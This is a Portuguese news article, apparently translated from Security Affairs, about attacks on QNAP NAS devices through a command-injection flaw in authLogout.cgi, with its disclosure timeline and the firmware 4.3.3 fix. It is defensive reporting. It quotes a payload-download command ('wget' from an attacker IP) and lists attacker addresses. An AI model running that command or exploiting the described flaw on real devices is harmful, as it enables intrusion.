Hackers têm como alvo os dispositivos QNAP NAS

De acordo com um  relatório  publicado por pesquisadores do Network Security Research Lab (360 Netlab) da Qihoo 360, os invasores estão explorando a vulnerabilidade de execução de comando remoto devido a um problema de injeção de comando que reside nos dispositivos NAS do firmware QNAP.

Os pesquisadores descobriram que o problema reside no programa CGI

 /httpd/cgi-bin/authLogout.cgi.

que é usado quando o usuário faz logout para selecionar a função de logout correspondente com base no nome do campo no Cookie.

“O problema é que QPS_SID, QMS_SID e QMMS_SID não filtram caracteres especiais e chama diretamente a função snprintf para unir a string de comando curl e chama a função do sistema para executar a string, tornando possível a injeção de comando.” lê o relatório publicado pela 360 Netlab.

Um invasor remoto não autenticado pode explorar a falha para obter autenticação usando o executável authLogout.cgi, porque ele não filtra caracteres especiais da entrada antes de chamar a função do sistema para executar a string de comando. Este comportamento possibilita a injeção de comandos e permite a execução remota de código.

Os pesquisadores do 360 Netlab relataram a falha ao QNAP PSIRT em 13 de maio e em 12 de agosto o fornecedor confirmou que o problema foi resolvido em uma atualização de segurança anterior, mas que ainda existem dispositivos QNAP NAS online que precisam ser atualizados.

A QNAP abordou a vulnerabilidade com o lançamento da versão do firmware 4.3.3 em 21 de julho de 2017. A correção proposta pelo fornecedor substitui a função usada para executar as sequências de comando.

“Esta versão substituiu a função do sistema por qnap_exec, e a função qnap_exec é definida no /usr/lib/libuLinux_Util.so.0”, continua 360 Netlab. “Usando o execv para executar o comando personalizado, a injeção de comando foi evitada.”

Os pesquisadores notaram que dois invasores IP, 219.85.109.140 e 103.209.253.252, estavam usando a mesma carga baixada com um arquivo wget http://165.227.39.105:8096/aaa após exploits bem-sucedidos.

360 Netlab apontou que os invasores não automatizaram totalmente o ataque usando um botnet, no momento seu verdadeiro propósito ainda é um mistério.

“Recomendamos que os usuários do QNAP NAS verifiquem e atualizem seus firmwares em tempo hábil e também verifiquem se há processos e conexões de rede anormais”, concluem os pesquisadores.

O relatório publicado pela 360 Netlab inclui indicadores de comprometimento (IoCs) junto com a lista de todas as versões de firmware QNAP afetadas .

No início de agosto, a empresa taiwanesa instou seus usuários a atualizar o aplicativo Malware Remover para evitar que dispositivos NAS sejam infectados pelo  malware QSnatch .

A Agência de Segurança Cibernética e de Infraestrutura dos Estados Unidos (CISA) e o Centro Nacional de Segurança Cibernética (NCSC) do Reino Unido também publicaram um  comunicado conjunto  sobre uma campanha massiva em andamento espalhando o malware de roubo de dados QSnatch.

Fonte: https://securityaffairs.co/wordpress/107750/hacking/qnap-nas-attacks.html